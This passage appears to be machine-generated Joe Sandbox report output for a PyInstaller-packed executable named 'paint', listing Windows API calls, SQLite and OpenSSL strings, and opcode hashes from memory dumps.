                                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
                                                                                                                                                                                                                                                                • API String ID: 4225454184-1404302391
                                                                                                                                                                                                                                                                • Opcode ID: a6dc8db243f1a1c96d35a00d03fc856939b0bdf9cf4add3f83b6bcb6089b802e
                                                                                                                                                                                                                                                                • Instruction ID: c3a01b2d339d98cb4f65322bce1a4efed0a8ce8722b6658bcf64d7aaa729af94
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6dc8db243f1a1c96d35a00d03fc856939b0bdf9cf4add3f83b6bcb6089b802e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25F15C62B0AA4385FB649F11A464BB9B394FF46B84F244135C96E077F9CF3CE446A341
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                                • Instruction ID: af8c24269209165b98cb0864f414d9f6bf6914952fe75db10fabfb79404f2578
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82D18332A0974196EB60AF25D4403ADB7A2FB56788F500136EEAE977D5EF39E140C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6F0BEF11A,?,?,000002076F5096E8,00007FF6F0BEADC3,?,?,?,00007FF6F0BEACBA,?,?,?,00007FF6F0BE5FAE), ref: 00007FF6F0BEEEFC
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6F0BEF11A,?,?,000002076F5096E8,00007FF6F0BEADC3,?,?,?,00007FF6F0BEACBA,?,?,?,00007FF6F0BE5FAE), ref: 00007FF6F0BEEF08
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                                • Instruction ID: 6a1bdb23e936fd7f42fef10fe50e52eb6c64d494d97c892e80570c4d225324bd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F341DC61B19A02A1FB56CB16980467523A6BF4AB90FC84539ED3FC77C4FE7EE805C204
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2C9E
                                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2D63
                                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF6F0BD2D99
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                                • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                                • Instruction ID: 74a1d41eeb86fb3bacc1a54d940c81f37d22737b76f742503b2c4ee3a7605bbe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A31E736B08B4162E7209B61A8146ABA696BF85788F810135EF5ED3799FF3DD546C300
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2016607190.00007FFE00761000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016576633.00007FFE00760000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE007E3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE0080D000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE00818000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE00823000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016859124.00007FFE00827000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016893620.00007FFE00829000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffe00760000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
                                                                                                                                                                                                                                                                • API String ID: 0-2528746747
                                                                                                                                                                                                                                                                • Opcode ID: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
                                                                                                                                                                                                                                                                • Instruction ID: d5438c1ab7d8a43197d8d6ec84fe4488ca1a986aee0f0b9701666be9f4b463cc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32B17E61A0A64295FB21FB52D8402BD2765BF847C4F484033EB8D17BBEDE3CEA458352
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDDBD
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDDCB
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDDF5
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDE63
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDE6F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                                • Instruction ID: cd9b4745b9f245c73ef0761b963d4302fbcde324ea49b6a6bd431ce616866e7a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F31B421B1B602A2EF219B52A800675A399FF5ABA0FC94535DD7E8B3C0FF3DE4448304
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6F0BD351A,?,00000000,00007FF6F0BD3F23), ref: 00007FF6F0BD2AA0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                                • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                                • Instruction ID: c45071b39fe7a203cf4105d7ff0325b1c81044151180f5b5fbfefcafb3be323a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91218372619782A2E7209B51B4417E6A3A4FB897C4F800131EE9E93799EF3DD1458740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                                                • Opcode ID: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
                                                                                                                                                                                                                                                                • Instruction ID: 0d1b3dee8a3fa41962de25fb3e264486efd0224d3d2be7e44cc11a1d7d7c7d44
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E218531A0C64292EB109B95F45463AE3A5FF86BA1F900235E67EC7BE4EF7ED4448740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                • Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                                                                                                                                                                                                                                • Instruction ID: bbf68cfa50da0a2ef77e92b39c4dc447a4e2413ee47612c2d0c3431193a22681
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96216820F0C203A2FB686761565153EA6525F467A0F808774EA3FC6BDBFE3EB4008301
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                                • Instruction ID: e38d1d0bbaa1cf34920b9637b55754055e6fecf8fefd53a746e6bffa39d3b7e5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E311D035B18A4182F3608B92E85472976A8FB89BE5F440234EA6EC77E4EF3DD904C740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                                                                                                • API String ID: 4225454184-1299490920
                                                                                                                                                                                                                                                                • Opcode ID: 42839b2f95b9c923c0519508061ddd42293effc3ab569f72f0bfea2cc60866dc
                                                                                                                                                                                                                                                                • Instruction ID: 39ac2396500219983592f880ebd50cebee78184f10808275cebc573bc2075c9a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42839b2f95b9c923c0519508061ddd42293effc3ab569f72f0bfea2cc60866dc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8029B62B0ABC282EB508F11E460BB97BA1FB86B94F044231DE6D077E9DF3CE4459740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD8592
                                                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD85E9
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6F0BD45E4,00000000,00007FF6F0BD1985), ref: 00007FF6F0BD9439
                                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD8678
                                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD86E4
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD86F5
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD870A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                                                • Opcode ID: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
                                                                                                                                                                                                                                                                • Instruction ID: 0ef6f20dda38a34aa6ed094f57ae08ab0b7df4001c51ce10687f89d8e248adfb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F441E562B1A68251E7309F11A5046AAA395FF86BD5F840131DF6ED7BC9FE3DE401C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                                                • Opcode ID: 8c52ddcc36590edf680ba46134fdbbf73a088618ff38eaf43da130e1a75dd050
                                                                                                                                                                                                                                                                • Instruction ID: ba7af55bf64a647dcf96db9d81cfa156bd7d1044ee10fd63b0d0e506ccfdbf06
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c52ddcc36590edf680ba46134fdbbf73a088618ff38eaf43da130e1a75dd050
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAF1AE73709B8296DBA08F55E050BAD77A0FB46B94F108036EE9E43BA9DF38D944D700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00007FFDFB0C6ABE
                                                                                                                                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDFB0C67BE
                                                                                                                                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 00007FFDFB0C6795
                                                                                                                                                                                                                                                                Memory Dump Source
